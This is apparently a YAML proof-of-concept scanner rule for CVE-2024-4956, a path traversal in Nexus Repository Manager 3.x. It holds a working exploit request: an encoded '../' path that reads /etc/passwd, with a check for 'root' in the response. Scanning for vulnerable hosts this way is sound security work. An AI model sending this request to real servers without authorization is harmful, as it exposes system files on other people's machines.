name: poc-yaml-nexus-repo-path-traversal
rules:
  - method: GET
    path: "/.%2f/..%2f/..%2f/..%2f/..%2f/etc/passwd"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
    expression: |
      response.status == 200 && response.body.bcontains(b'root')
detail:
  author: yishuizhe
  Affected Version: "Nexus Repository Manager 3.x"
  name: Nexus Repository 3 Path Traversal Vulnerability (CVE-2024-4956)